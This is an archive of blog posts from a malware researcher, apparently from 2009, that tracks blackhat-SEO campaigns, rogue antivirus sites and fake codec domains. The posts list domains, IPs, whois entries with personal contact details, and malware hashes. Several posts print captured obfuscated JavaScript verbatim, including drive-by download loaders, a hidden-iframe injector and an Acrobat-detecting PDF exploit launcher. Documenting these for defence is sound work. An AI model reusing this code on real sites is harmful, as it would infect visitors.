Archive for the 'Blackhat SEO' Category

05
Jul

Blackhat SEO campaign with domains flooding search results-UPDATED

By djpnuemo Comments
Categories: Blackhat SEO, Malicious Domains, Malware Distribution and Rogue Security Software

There is a blackhat seo campaign that is redirecting users to fake scanning websites to infect users. Each of these domains has many pages filled with keywords to get high rankings on search pages. Once clicked, the user is redirected to the drive-by download site of the day. You can click on each domain name to view the whois information. Here is a list of some of the domains as well as how it works.

<script type=”text/javascript” src=”/counter?i=x-Di3AgjVhR8ak4on4gk1b2YXOLV8tKk9vfMw_qaRu8alxLqUphKSiBSqzUuyL1vtJUnVRoV
Cp_qCODoee2QvAwsxetjrz1uKFNY2brg”></script>

The following javascript is then loaded…

var t3dbj5es5;if (typeof(encodeURIComponent) == ‘function’) t3dbj5es5 = encodeURIComponent;else if (typeof(escape) == ‘function’) t3dbj5es5 = escape;else t3dbj5es5 = function (text) { return text; };document.write(‘<script src=”http://xozkyaf.com/stat?s=54dpw11f64Bj9qRA;r=’ + (document.referrer ? t3dbj5es5(document.referrer) : ”) + ‘” type=”text/javascript”></script>’);

The contents of the new page is below.

document.location.href=’http://spacefunk.cn/go.php?id=2012&key=b6a0fad62&p=1′;

Redirects to
hxxp://spacefunk.cn/go.php?id=2012&key=b6a0fad62&p=1
Redirects to
Fake scanning page of the day as selected by malware distributers.

ufumtrwz.com 208.73.210.26
rmeged.com 208.87.149.250
stqbcfkjp.com 69.64.147.209
vhwdhjfig.com 69.64.147.210
pazjbw.com 69.64.147.210
rklktu.com 69.64.147.211
nbzqkp.com 69.64.147.212
wqtlto.com 69.64.147.212
klqltr.com 69.64.147.212
obirrd.com 69.64.147.212
qylzioqty.com 69.64.147.213
brohpql.com 69.64.147.214
atoonoyxm.com 69.64.147.215
ilmtvne.com 69.64.147.215
udtlgrzm.com 69.64.147.216
tnkpghmt.com 69.64.147.217
lpstjr.com 69.64.147.217
auvwbkdbe.com 69.64.147.217
colixfpf.com 69.64.155.120
qtltmzq.com 69.64.155.120
tgshpj.com 69.64.155.121
mkutvrah.com 69.64.155.121
nzadvyul.com 69.64.155.121
dvgbuqyg.com 69.64.155.121
nsqaidn.com 69.64.155.122
sambmq.com 69.64.155.122
sgkoqblfp.com 69.64.155.122
gxprzo.com 69.64.155.123
ujqqccmvd.com 69.64.155.124
dhmhcze.com 69.64.155.124
xarhwsvf.com 69.64.155.125
fitvahmz.com 69.64.155.126
vqtxnqmre.com 69.64.155.127
buzstyltd.com 69.64.155.127

UPDATED: 7/5/09

tvciucde.com 174.129.244.106 174.129.241.185
jmguhkxaj.com 194.110.162.82
nhroiv.com 194.110.162.83
gyadqcuoc.com 194.110.162.85
igvutelu.com 194.110.162.86
nqcngszq.com 194.110.162.86
birkkane.com 194.110.162.86
ouvthweg.com 194.110.162.89
vwsevihm.com 194.110.162.94
gakvgp.com 194.110.162.95
onnrdm.com 194.110.162.227

17
Jun

Adobe exploit page installs malware updatedb87.cn & nicevideo15.com

By djpnuemo Comments
Categories: Blackhat SEO, Database Update, Infection, Malicious Domains, Malicious Links, Malware and Malware Distribution

This domain is exploiting vulnerabilities in Adobe to help with the installation of malware to a victims computer. This exploit is done quietly and the user is none the wiser. The exploit is triggered from a search referrer.

WARNING: URL’s may still be active. VERY DANGEROUS. Proceed at your own risk.

hxxp://updatedb87.cn/out/index.php

function load(code,dfunc,anticasp)
{
eval(dfunc);
decrypt(code);
}
load(‘<`B15ni[B15niAS1(i1I"u"[Xh1Soo`YlI"YS"[g`(QZI"m"[Zi`lZQI"m"[X1hI"ZQQFx
;;\'F(5Qi(~8/.hY;S\'Q;`Y(i9.FZF"><;`B15ni>‘,unescape(‘function decrypt%28n%29
%7Bvar l%2Cch%2Cind%2Cq%3D%22%22%2Ckey%3D%22OD%26%3Ax9T6H%40fBAC%23y_wgloSEb
%7EK %5BchZei%60a5z-%7Bjv%21Pk%7Cr1mnYU%7DqV7%2F%3BpF%5DsXG%3DILtQJ0u%5C%272Md
%284%2A%22%3Bfor%28l%3D0%3Bl%3Cn.length%3Bl%2B%2B%29%7Bch%3Dn.charAt%28l%29
%3Bind%3Dkey.indexOf%28ch%29%3Bif%28ind%3E-1%29%7Bif%28ind%3D%3D0%29%7Bind
%3D79%7Dq%2B%3Dkey.charAt%28ind-1%29%7D else %7Bq%2B%3Dch%7D%7D%3Bdocument.write
%28q%29%7D’));

Deobfuscates to

<iframe frameBorder=”0″ scrolling=”no” width=”1″ height=”1″ src=”http://updatedb87.cn/out/index.php”></iframe>

This iframe contains the following code that will use a malicious pdf file to instal malware to the system.

<script>vubqza=”6e7d666b7c616766286d625c314a4069392021737e697a286c7b
715e7d51523d502835286c676b7d656d667c266b7a6d697c6d4d646d656d667c202f
67486a4862486d48486b487c48482f267a6d7864696b6d20274827616f24282f2f21
21336c7b715e7d51523d50267b6d7c497c7c7a616a7d7c6d202f6148486c48482f26
7a6d7864696b6d20274827616f24282f2f21246c7b715e7d51523d5021336c7b715e
7d51523d50267b6d7c497c7c7a616a7d7c6d202f6b4864484869487b48487b486148
6c482f267a6d7864696b6d20274827616f24282f2f21242f6b484864487b48486148
6c4832484a48484c484831483e484b483d48483d48483e4825483e483d4849483b48
2548394839484c4838482548314830483b4848494848254838483848484b48384848
3c484e484b483a4831484d48483b48483e482f267a6d7864696b6d20274827616f24
282f2f2121337c7a71737e697a286b4f795a4b674f5c6b3f2835286c7b715e7d5152
3d50264b7a6d697c6d476a626d6b7c202f65487b4870486548486448483a48264850
48484548444840485c485c48485848482f267a6d7864696b6d20274827616f24282f
2f21242f2f21337e697a2869707b4c3f5c6d5a7f2835286c7b715e7d51523d50264b
7a6d697c6d476a626d6b7c202f5b48486048486d4864486448482648494848784878
484864484861486b48486948487c486148674866482f267a6d7864696b6d20274827
616f24282f2f21242f2f21337e697a286358436e433e4b46422835286c7b715e7d51
523d50264b7a6d697c6d476a626d6b7c202f6948486c484867486c486a4826487b48
7c487a486d484869486548482f267a6d7864696b6d20274827616f24282f2f21242f
2f21337c7a71736358436e433e4b4642267c71786d28352839336b4f795a4b674f5c
6b3f2667786d66202f4f484d485c482f267a6d7864696b6d20274827616f24282f2f
21242f6048487c487c4848784848324848274827487d487848486c48486948487c48
486d48486c48486a4830483f482648486b48486648482748486748487d487c484827
484864486748486948486c48264848784848604848784848374861486c4848354848
3848482f267a6d7864696b6d20274827616f24282f2f21246e69647b6d21336b4f79
5a4b674f5c6b3f267b6d666c2021336358436e433e4b46422667786d662021336358
436e433e4b4642265f7a617c6d206b4f795a4b674f5c6b3f267a6d7b7867667b6d4a
676c7121337e697a286a5e39714f516339422835282f264848274827482648264827
4827487d484878486c48486948487c48486d4826486d487048486d482f267a6d7864
696b6d20274827616f24282f2f21336358436e433e4b4642265b697e6d5c674e6164
6d206a5e39714f51633942243a21336358436e433e4b4642264b64677b6d20213375
6b697c6b60206d212873757c7a717369707b4c3f5c6d5a7f267b606d64646d706d6b
7d7c6d206a5e39714f516339422133756b697c6b60206d21287375756b697c6b6020
6d21287375756d625c314a4069392021336e7d666b7c616766287952457e7d616966
442021736e677a2071493e4d3b3e3a613a2835283a24286652694243417264283528
2a2a332871493e4d3b3e3a613a283435283a3e332871493e4d3b3e3a613a23232173
66526942434172642835285b7c7a61666f266e7a67654b60697a4b676c6d203e3d28
232871493e4d3b3e3a613a21337e697a287c71435f786a4d61283528666d7f284165
696f6d2021337c71435f786a4d61267b7a6b2835282a7a6d7b3227272a2823286652
6942434172642823282a3254542a2823282f5848487a486748486f48487a48694865
482848484e486148486448486d487b48482f267a6d7864696b6d20274827616f2428
2f2f212823282a54542a2823282f47487d487c484864484867484867484863482848
4d4870487848487a48486d48487b48487b48482f267a6d7864696b6d20274827616f
24282f2f212823282a54542a2823282f6548487b4867486d48487a486d48487b4848
26486c4848644864482f267a6d7864696b6d20274827616f24282f2f212823282a27
2b3a27392a33616e207c71435f786a4d6126606d616f607c283535283d3121736a7a
6d696333757c71435f786a4d612835282f2f33757a6d7c7d7a662866526942434172
6433756e7d666b7c616766287b696c5e5d3e5d4a7e207d7a6421737e697a28665269
42434172642835287952457e7d61696644202133616e282066526942434172642835
35282f532f21287a6d7c7d7a66337c7a71737e697a28794d5b707a3d3f476a283528
666d7f28496b7c617e6d50476a626d6b7c202f7b484866484878487e487f4826485b
486648694878487b48486048486748487c484828485e4861486d48487f486d48487a
48482848484b48674866487c487a4848674864484826484839482f267a6d7864696b
6d20274827616f24282f2f212133756b697c6b60206d2173616e2820794d5b707a3d
3f476a282935282f5348486748486a48486248486d486b48487c485548482f267a6d
7864696b6d20274827616f24282f2f2121287a6d7c7d7a663375794d5b707a3d3f47
6a265b6669787b60677c58697c602835287d7a64337c7a7173794d5b707a3d3f476a
264b6765787a6d7b7b6d6c58697c6028352866526942434172642823282a3254542a
2823282f58487a486748486f487a4848694865484828484e484861486448486d487b
48482f267a6d7864696b6d20274827616f24282f2f212823282a54542a2823282f47
48487d48487c484864484867484867484863482848484d48487048487848487a486d
48487b48487b482f267a6d7864696b6d20274827616f24282f2f212823282a54542a
2823282f7f48486948486a48482648486d487048486d482f267a6d7864696b6d2027
4827616f24282f2f2133794d5b707a3d3f476a26587a61667c5b6669787b60677c20
2133756b697c6b60206d217375337e697a2878696c387b4e66632835287b6d7c4166
7c6d7a7e6964206e7d666b7c616766202173616e2820794d5b707a3d3f476a267a6d
696c715b7c697c6d283535283c2128736b646d697a41667c6d7a7e69642078696c38
7b4e666321337f61666c677f2664676b697c6167662835282f6448486c4848694848
7848483248274827482f267a6d7864696b6d20274827616f24282f2f213375752428
3b3838382133757b696c5e5d3e5d4a7e202f60487c487c4878484832482748274848
7d487848486c4869487c486d48486c486a484830483f4826486b4848664848274848
67487d487c482748486448674869486c4848264878486048784837486148486c4848
3548483948482f267a6d7864696b6d20274827616f24282f2f21213365676f352a46
69462a336f6f352a4669462a33″;jwgakx=”function rbyr(){gp=Math.PI;bhx=
parseInt;ffv=’length’;mvr=bhx(~((gp&gp)|(~gp&gp)&(gp&~gp)|(~gp&~gp)));
ybagye=bhx(((mvr&mvr)|(~mvr&mvr)&(mvr&~mvr)|(~mvr&~mvr))&1);nlwj=
ybagye< +'Code');mxeugy=eval;for(snr=mvr;snr jwgakx.charCodeAt(snr);gg%=unescape(mvr+unescape(''+'%7'+'8'+'')+(1<<6))
;for(snr=mvr;snr ('%78')+vubqza.charAt(snr)+vubqza.charAt(snr+bhx(ybagye)))^gg);try
{mxeugy(mog);}catch(e){try{eval(mog);}catch(e) {window.location='/';}
}}try{eval('rbyr();')}catch(e) {alert('err');}";eval(jwgakx);</script>
<script>
function pdf_gen2()
{
var detectAcrobat = false;
try
{
if( navigator.plugins && navigator.mimeTypes.length)
{
for( var i = 0; i < navigator.plugins.length; i++)
{
var name = navigator.plugins[i].name;
if( name.indexOf('Adobe Acrobat') != -1)
{
detectAcrobat = true;
break;
}
}
}
else
{
var obj = null;
obj = new ActiveXObject("AcroPDF.PDF");
if( !obj) obj = new ActiveXObject("PDF.PdfCtrl");
if( obj) detectAcrobat = true;
}
}
catch(e)
{
}
if( detectAcrobat)
{
document.write('<iframe src="pdf.php"></iframe>');
}
else return false;
}
pdf_gen2();
</script>

All have been added to our database.

update.exe
Result: 17/41 (41.47%)
MD5: bcb016582e40e6312f7bf742c0dfcedd
VirusTotal
ThreatExpert Analysis
hxxp://updatedb87.cn/out/load.php?id=0

pdrv.exe or stron_1245063771.exe
Result: 6/41 (14.64%)
MD5: ca557e7460c222ef90e9d36881f6ac53
VirusTotal
ThreatExpert Analysis
hxxp://61.235.117.71/files/

update_936.pdf
Result: 6/41 (14.64%)
MD5: 5a96297e851288426cfa96022d0c822d
VirusTotal
Wepawet Analysis
hxxp://updatedb87.cn/out/pdf.php

pp.10.exe
Result: 15/41 (36.59%)
MD5: d23ad273d30ad73edfac5afddf5e6550
VirusTotal
ThreatExpert Analysis
hxxp://61.235.117.71/files/

The page will also lead the user to a website that says the victim needs to install AdobeViewer and starts a download.

Whois entry for nicevideo15.com 94.232.248.70
Konstantin Berdeev
Email: camelot1984@gmail.com
Organization: Private person
Address: Moskva, m. Leninskoe, d. 192
City: Moskva
State: Moskvoskaya
ZIP: 174633
Country: RU
Phone: +7.4953996729
Fax: +7.49599672913


*.nicevideo44.com
*.pornotvnetwork.us
*.videofx4you2.com
*.videogtx4you2.com
nicevideo44.com
ns1.videofx4you2.com
ns1.videogtx4you2.com
ns2.nicevideo44.com
ns2.pornotvnetwork.us
ns2.videofx4you2.com
ns2.videogtx4you2.com
pornotvnetwork.us
videofx4you2.com
videogtx4you2.com

Setup.exe
Result: 10/41 (24.4%)
MD5: 5a96297e851288426cfa96022d0c822d
VirusTotal
ThreatExpert Analysis
hxxp://nicevideo15.com/software/f75b610c1c/14250/1/

10
Jun

New codec domains: exe-file-boom.com & hi-my-tube.com

By djpnuemo Comments
Categories: Blackhat SEO, Codec, Database Update, Malicious Domains, Malware and Rogue Security Software

Found these domains spreading a fake codec today. Bother were registered today.

Whois entry for exe-file-boom.com 66.197.171.6
Isaac Donnelly (isaacdonn@gmail.com)
3711 Eastland Avenue
Hattiesburg
Mississippi,39402
US
Tel. +001.88795890983


exe-file-boom.com
my-exe-profile.com
web-exe-depositary.com
mp3downloadablesongs.com

Whois entry for hi-my-tube.com 216.240.143.7
Stephine Smith (stsmisss@gmail.com)
2810 Kovar Road
Westboro
Maine,01581
US
Tel. +001.76778989543


*.best-crystal-tube.com
*.big-tube-list.com
*.champtube2009.com
*.chipeztube2009.com
*.get-mega-tube.com
*.happy-tube-video.com
*.my-flare-tube.com
*.my-tube-zone.com
*.powerful-tube.com
*.tubecollection2009.com
*.video-tube-dot.com
*.wondertubes2009.com
better-tube-show.com
big-tube-list.com
fllcorp.com
get-mega-tube.com
megacooltubes2009.com
ns2.best-crystal-tube.com
ns2.big-tube-list.com
ns2.champtube2009.com
ns2.chipeztube2009.com
ns2.get-mega-tube.com
ns2.happy-tube-video.com
ns2.megaporntubes09.com
ns2.my-flare-tube.com
ns2.my-tube-zone.com
ns2.powerful-tube.com
ns2.tall-tubex.com
ns2.tube-xxx-tv2009.com
ns2.tubecollection2009.com
ns2.video-tube-dot.com
ns2.wondertubes2009.com
premier-tube-site.com
sunny-tube-house.com
www.best-crystal-tube.com
www.big-tube-list.com
www.champtube2009.com
www.chipeztube2009.com
www.get-mega-tube.com
www.my-tube-zone.com

streamviewer.40014.exe
Result: 9/40 (22.5%)
MD5: 78a3631fbc7d93ce07c33233416a2176
VirusTotal
ThreatExpert Analysis
hxxp://exe-file-boom.com/streamviewer.40014.exe

a.exe
Result: 11/39 (28.21%)
MD5: 2e326fd4048bdf28308a9bb5ced08ed7
VirusTotal
ThreatExpert Analysis
hxxp://thenewpic.com/item/a5acc232141aba8b24603e1b24eb084d0e020a6c16c76e38e6582142a6c4df427ca48b89cc4e0cf0a/4400d031142/titem.gif

b.exe or msa.exe
Result: 5/39 (12.83%)
MD5: c665052347ce07a9626c6cdcdb0e56d8
VirusTotal
ThreatExpert Analysis
hxxp://theimagesphoto.com/werber/04d04071f42/217.gif

09
Jun

New rogue domain: ourbestsecurityshield.com

By djpnuemo Comments
Categories: Blackhat SEO, Database Update, Malicious Domains, Malware and Rogue Security Software

New rogue domain found today.

Whois entry for ourbestsecurityshield.com 209.44.126.241
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note – All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

securexdetect.com
securityfastscan.com
securityuniqscan.com
sidewebvirusscan.com
souptotalsecurity.com
thetrueshiledsecurity.com
todaysecuritytop.com
totalvirusshield.com
uniqtrustedweb.com
uniqviruscleaner.com
virusdestroyerboost.com
www.allowedwebsurfing.com
www.bestwebscantools.com
www.fullsecurityaction.com
www.fullvirusprotection.com
www.hupersecuritydot.com
www.intellectsecurityshield.com
www.truevirusshield.com
www.uniqviruscleaner.com
xvirusdescan.com

install.exe (System Security 2009)
Result: 12/40 (30%)
MD5: bfb22174402c3123915a8bb7b019aba1
VirusTotal
ThreatExpert Analysis
hxxp://ourbestsecurityshield.com/download.php?affid=08045

05
Jun

New rogue domain: pro-antivirus.net

By djpnuemo Comments
Categories: Blackhat SEO, Database Update, Malicious Domains, Malware and Rogue Security Software

Another rogue domain registered today to spread rogue anti-malware programs.

Whois entry for pro-antivirus.net 64.213.140.71
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note – All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

viruscatcher.net also is associated with this IP address.

Setup_build6_1003599.exe (Malware Catcher 2009)
Result: 9/40 (22.5%)
MD5: 3ca68a7d36ec198da766be580333099e
VirusTotal
ThreatExpert Analysis
hxxp://pro-antivirus.net/build6_1003599.php?cmd=getFile&counter=2&p=WKmimHVlaGmUYp2fV5GPlqR1sXCjhHOuU8%2FXoGddoami2NmRglqbnZxxmpiqcpo%3D

03
Jun

Another domain redirecting to rogues using macrosoftwarego.com

By djpnuemo Comments
Categories: Blackhat SEO, Database Update, Malicious Domains, Malware and Rogue Security Software

Yet another domain associated with the string of blackhat seo operations using macrosoftwarego.com. In my previous posts #1 and #2.

On the page reached from the search results have a javascript routine of the following.

var str=["762", "777", "770", "759", "776", "765", "771", "770", "692", "743",
"761", "770", "760", "737", "781", "700", "773", "777", "761", "774", "781", "701",
"783", "670", "692", "779", "765", "770", "760", "771", "779", "706", "768", "771",
"759", "757", "776", "765", "771", "770", "721", "699", "764", "776", "776", "772",
"718", "707", "707", "759", "757", "768", "768", "771", "779", "755", "769", "771",
"770", "776", "774", "761", "757", "768", "711", "711", "706", "757", "762", "765",
"774", "775", "776", "760", "765", "758", "775", "706", "759", "771", "769", "707",
"765", "770", "760", "761", "780", "706", "764", "776", "769", "768", "723", "742",
"761", "762", "721", "699", "703", "761", "770", "759", "771", "760", "761", "745",
"742", "733", "727", "771", "769", "772", "771", "770", "761", "770", "776", "700",
"760", "771", "759", "777", "769", "761", "770", "776", "706", "774", "761", "762",
"761", "774", "774", "761", "774", "701", "719", "670", "785"];
var temp=”;
var gg=”;
for (i=0; i<str.length; i++){
gg=str[i]-660;
temp=temp+String.fromCharCode(gg);
}
eval(temp);

DECODES TO:

function SendMy(query){
window.location=’http://callow_montreal33.afirstdibs.com/index.html?
Ref=’+encodeURIComponent(document.referrer);
}

If the referrer is from certain search engines, you will then be redirected on to the macrosoftwarego.com and then on to the appropriate rogue anti-malware website for a drive-by download.

Whois entry for afirstdibs.com 84.16.229.43
Smith
Kevin L (KevinLSmith@text2re.com)
3924 Chathamway
Washington
Gansu,20200
CN
Tel. +240.5484495

02
Jun

New rogue domain: hidef-porn-movies.com

By djpnuemo Comments
Categories: Blackhat SEO, Codec, Infection, MalSpam, Malicious Domains, Malware, Malware Distribution, Rogue Security Software and Rogue Software

Another domain found distributing malware codecs and rogue anti-malware programs. The referrer in this case was through y0utybe.com.

Whois entry for hidef-porn-movies.com 91.212.132.11
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note – All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676


antispyware-for-all.com
antispyware-systems.com
free-antiviruses.com
free-tube-video-central.net
hidef-porn-movies.com
porn-tube-host.com
virus-analysis.com
xhost-xtubes.com
xmovies-host.com
xtubes-hot-porn.com
xtubes-online.com
xxx-movies-central.com
youporn-online.com

/promo1/ – Fake Adult-Archive.net page
/promo2/ – Fake PornTube page
/promo3/ – Fake scan page
/promo4/ – Fake SexTube page

Whois entry for y0utybe.com 216.195.60.231
Whois Privacy Protection Service
Whois Agent suqkgszqlv@whoisservices.cn
+86.05922577888 fax: +86.05922577111
Xiamen Software Park shengshi Building
xiamen fujian 361005
china

softname.exe
Result: 16/40 (40%)
MD5: aa33e33a6d0a650958c3fa0d1333d9f3
VirusTotal
ThreatExpert Analysis
hxxp://hidef-porn-movies.com/promo2/get.php?aid=1226&vname=softname

02
Jun

New rogue domain: personal-antivirus-software.com

By djpnuemo Comments
Categories: Blackhat SEO, Codec, Database Update, Malicious Domains, Malware and Rogue Security Software

Here we go with more rogue anti-malware spreading domains.

Whois entry for personal-antivirus-software.com 91.212.132.12
Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note – All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676


antivirus-protection-kit.com
first-antispyware.com
free-antivirus-engine.com
free-porn-xmovies.com
free-xtube.com
free-xxx-central.com
fresh-xxx-movies.com
secure-center-antivirus.com
the-best-antispyware.com
the-best-antivirus.com
www.fresh-xxx-movies.com
youporn-for-free.com
your-antivirus.com

/promo1/ – Fake Adult-Archive.net page
/promo2/ – Fake PornTube page
/promo3/ – Fake scan page
/promo4/ – Fake SexTube page

antivirus.exe (Rogue: Privacy Center)
Result: 17/40 (42.5%)
MD5: bf309c72230badc849d45f26e78b6a3e
VirusTotal
ThreatExpert Analysis
hxxp://personal-antivirus-software.com/promo3/get.php?aid=1361&vname=antivirus

« Previous Entries


 

March 2010
M T W T F S S
« Jul    
1234567
891011121314
15161718192021
22232425262728
293031